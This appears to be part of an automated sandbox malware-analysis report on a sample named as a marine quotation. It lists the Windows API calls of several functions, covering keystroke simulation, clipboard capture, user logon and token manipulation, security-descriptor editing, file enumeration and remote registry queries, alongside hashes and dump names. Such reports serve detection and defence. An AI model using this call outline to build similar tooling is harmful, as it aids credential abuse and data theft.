                                                                            • SendMessageW.USER32 ref: 006C9AAE
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 006C9AEB
                                                                            • SendMessageW.USER32 ref: 006C9B1A
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006C9B3B
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006C9B4A
                                                                            • GetCursorPos.USER32(?), ref: 006C9B68
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9B75
                                                                            • GetParent.USER32(?), ref: 006C9B93
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 006C9BFA
                                                                            • SendMessageW.USER32 ref: 006C9C2B
                                                                            • ClientToScreen.USER32(?,?), ref: 006C9C84
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006C9CB4
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 006C9CDE
                                                                            • SendMessageW.USER32 ref: 006C9D01
                                                                            • ClientToScreen.USER32(?,?), ref: 006C9D4E
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006C9D82
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C9E05
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                            • String ID: @GUI_DRAGID$F$p#p
                                                                            • API String ID: 3429851547-3138188465
                                                                            • Opcode ID: 00507060acd773b68595fbb276c5b0e9e623cd824b2143942385edaaebdfe950
                                                                            • Instruction ID: d6b99af577179a3026abdbe5bb1fda63f46583b455db65072f8ee89aad343d0f
                                                                            • Opcode Fuzzy Hash: 00507060acd773b68595fbb276c5b0e9e623cd824b2143942385edaaebdfe950
                                                                            • Instruction Fuzzy Hash: A9426834204241AFEB24CF25C848FBABBE6EF49320F14461DF699972A1D731E961CB65
                                                                            Function 006C4873 Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 566windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006C48F3
                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 006C4908
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 006C4927
                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 006C494B
                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 006C495C
                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 006C497B
                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006C49AE
                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006C49D4
                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 006C4A0F
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 006C4A56
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 006C4A7E
                                                                            • IsMenu.USER32(?), ref: 006C4A97
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006C4AF2
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006C4B20
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C4B94
                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 006C4BE3
                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 006C4C82
                                                                            • wsprintfW.USER32 ref: 006C4CAE
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C4CC9
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 006C4CF1
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006C4D13
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C4D33
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 006C4D5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 4054740463-328681919
                                                                            • Opcode ID: 082ecdfc09b37a282892a590bae34039e786943d20baefd77c2cedc3339660f9
                                                                            • Instruction ID: ce6c999fb0f506f0ae865948301dbc6c32a39a9dafa0b45a0c9c6dd719689342
                                                                            • Opcode Fuzzy Hash: 082ecdfc09b37a282892a590bae34039e786943d20baefd77c2cedc3339660f9
                                                                            • Instruction Fuzzy Hash: 5012DE71600214ABEB249F29CC59FFE7BBAEF85320F10412DF51AEA2E1DB749941CB50
                                                                            Function 0064F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0064F998
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068F474
                                                                            • IsIconic.USER32(00000000), ref: 0068F47D
                                                                            • ShowWindow.USER32(00000000,00000009), ref: 0068F48A
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F494
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068F4AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0068F4B1
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068F4BD
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068F4CE
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068F4D6
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0068F4DE
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F4E1
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F4F6
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F501
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F50B
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F510
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F519
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F51E
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F528
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F52D
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F530
                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0068F557
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: 26c00bf88f65f903a6eb1f9b9ba7f931a4e0c47b45f1ebe5b7536409eb9b54d7
                                                                            • Instruction ID: 8b66b126e64079651b1dcd9a356553a1b814716678315c5a46ba1c8e7ae4b553
                                                                            • Opcode Fuzzy Hash: 26c00bf88f65f903a6eb1f9b9ba7f931a4e0c47b45f1ebe5b7536409eb9b54d7
                                                                            • Instruction Fuzzy Hash: 99318671A40218BFEB206BB55C4AFBF7E6EEB44B60F101026F605E61D1C7B05D11ABA1
                                                                            Function 00691201 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                              • Part of subcall function 006916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                              • Part of subcall function 006916C3: GetLastError.KERNEL32 ref: 0069174A
                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00691286
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006912A8
                                                                            • CloseHandle.KERNEL32(?), ref: 006912B9
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006912D1
                                                                            • GetProcessWindowStation.USER32 ref: 006912EA
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 006912F4
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00691310
                                                                              • Part of subcall function 006910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006911FC), ref: 006910D4
                                                                              • Part of subcall function 006910BF: CloseHandle.KERNEL32(?,?,006911FC), ref: 006910E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                            • String ID: $default$winsta0$Zo
                                                                            • API String ID: 22674027-784821077
                                                                            • Opcode ID: aefbb18b2c94a29ce0abf702245c44809839e6064e55a603eabe6a634db202d8
                                                                            • Instruction ID: 67d2b40bded6f2fdea77959f674719716c83961313ccb0e0482560cc162d75d2
                                                                            • Opcode Fuzzy Hash: aefbb18b2c94a29ce0abf702245c44809839e6064e55a603eabe6a634db202d8
                                                                            • Instruction Fuzzy Hash: 56819F7190020AAFEF119FA4DC49FEE7BFEEF09B14F244119F915AA6A0C7318945CB64
                                                                            Function 00690B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                              • Part of subcall function 006910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                              • Part of subcall function 006910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                              • Part of subcall function 006910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00690BCC
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00690C00
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690C17
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00690C51
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00690C6D
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690C84
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00690C8C
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00690C93
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00690CB4
                                                                            • CopySid.ADVAPI32(00000000), ref: 00690CBB
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00690CEA
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00690D0C
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00690D1E
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D45
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D4C
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D55
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D5C
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D65
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D6C
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00690D78
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D7F
                                                                              • Part of subcall function 00691193: GetProcessHeap.KERNEL32(00000008,00690BB1,?,00000000,?,00690BB1,?), ref: 006911A1
                                                                              • Part of subcall function 00691193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00690BB1,?), ref: 006911A8
                                                                              • Part of subcall function 00691193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00690BB1,?), ref: 006911B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: 8734297409bf20b21cd87233d632060ca43719918f36dfea5e68738ae4cb2fd6
                                                                            • Instruction ID: 792acddbdd1a53eb288791d8bd570fc9570ecd1d8557b33e29050b84e6dd6447
                                                                            • Opcode Fuzzy Hash: 8734297409bf20b21cd87233d632060ca43719918f36dfea5e68738ae4cb2fd6
                                                                            • Instruction Fuzzy Hash: 70714A72A0020AEFEF10DFA5DC44FEEBBBEBF08314F144515E919A6691D771A905CB60
                                                                            Function 006AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(006CCC08), ref: 006AEB29
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 006AEB37
                                                                            • GetClipboardData.USER32(0000000D), ref: 006AEB43
                                                                            • CloseClipboard.USER32 ref: 006AEB4F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEB87
                                                                            • CloseClipboard.USER32 ref: 006AEB91
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AEBBC
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 006AEBC9
                                                                            • GetClipboardData.USER32(00000001), ref: 006AEBD1
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEBE2
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AEC22
                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 006AEC38
                                                                            • GetClipboardData.USER32(0000000F), ref: 006AEC44
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEC55
                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006AEC77
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006AEC94
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006AECD2
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AECF3
                                                                            • CountClipboardFormats.USER32 ref: 006AED14
                                                                            • CloseClipboard.USER32 ref: 006AED59
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                            • String ID:
                                                                            • API String ID: 420908878-0
                                                                            • Opcode ID: 72c43d978252b1190be8660c81491d76a84df78745ed0b14901c7ebe020dfa56
                                                                            • Instruction ID: f2523c48b63f77485bef0c8f15d46cac33fb976c4c33f9ccd11396adfdd15f4d
                                                                            • Opcode Fuzzy Hash: 72c43d978252b1190be8660c81491d76a84df78745ed0b14901c7ebe020dfa56
                                                                            • Instruction Fuzzy Hash: FB61AD34204201AFD300EF24D989F7AB7A6EF85724F14951DF45A972A2DB72DD06CFA2
                                                                            Function 006A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A69BE
                                                                            • FindClose.KERNEL32(00000000), ref: 006A6A12
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006A6A4E
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006A6A75
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006A6AB2
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006A6ADF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                            • API String ID: 3232708057-3289030164
                                                                            • Opcode ID: 9a4c0a2fd4dbb168da8e1d1629af14d1af48275d82783bb7858d2820b2455242
                                                                            • Instruction ID: 8823fb1a760c9164859259d8e6b3cfcfcf6c87d3cd938c9a7019691847a57416
                                                                            • Opcode Fuzzy Hash: 9a4c0a2fd4dbb168da8e1d1629af14d1af48275d82783bb7858d2820b2455242
                                                                            • Instruction Fuzzy Hash: 8CD174B2508300AFC754EBA4C885EABB7EDEF89704F04491DF585D7291EB74DA04CBA2
                                                                            Function 006A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,769A8FB0,?,00000000), ref: 006A9663
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006A96A1
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 006A96BB
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A96D3
                                                                            • FindClose.KERNEL32(00000000), ref: 006A96DE
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006A96FA
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A974A
                                                                            • SetCurrentDirectoryW.KERNEL32(006F6B7C), ref: 006A9768
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006A9772
                                                                            • FindClose.KERNEL32(00000000), ref: 006A977F
                                                                            • FindClose.KERNEL32(00000000), ref: 006A978F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: f2e436552b89c8e7ff428ec3ad7a4aabb92e1777b2df654561ae35e69034ae31
                                                                            • Instruction ID: 79206b1618fb39e1e1fdaa2878d38b340883de2a538f43778e866d3463983663
                                                                            • Opcode Fuzzy Hash: f2e436552b89c8e7ff428ec3ad7a4aabb92e1777b2df654561ae35e69034ae31
                                                                            • Instruction Fuzzy Hash: A431A2325402196EDB14EFB4EC59EEE77AEDF4A321F204155F919E2190DB34DE448E34
                                                                            Function 006A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,769A8FB0,?,00000000), ref: 006A97BE
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A9819
                                                                            • FindClose.KERNEL32(00000000), ref: 006A9824
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006A9840
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A9890
                                                                            • SetCurrentDirectoryW.KERNEL32(006F6B7C), ref: 006A98AE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006A98B8
                                                                            • FindClose.KERNEL32(00000000), ref: 006A98C5
                                                                            • FindClose.KERNEL32(00000000), ref: 006A98D5
                                                                              • Part of subcall function 0069DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0069DB00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 025a5e82d247093eb4659b4bfc4f661e4e303da90f472d09d47e5f5ae5cfa06f
                                                                            • Instruction ID: 417ce41f789676fe01c04ba9426309303046d96417fc66176afe1f261bbf8be7
                                                                            • Opcode Fuzzy Hash: 025a5e82d247093eb4659b4bfc4f661e4e303da90f472d09d47e5f5ae5cfa06f
                                                                            • Instruction Fuzzy Hash: C03190315006196EDB10EFA4EC48EEE77BE9F47320F2445A9E918A2291DB38DE458F74
                                                                            Function 006BBE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBF3E
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 006BBFA9
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBFCD
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006BC02C
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006BC0E7
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC154
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC1E9
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 006BC23A
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC2E3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006BC382
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BC38F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3218304859-0
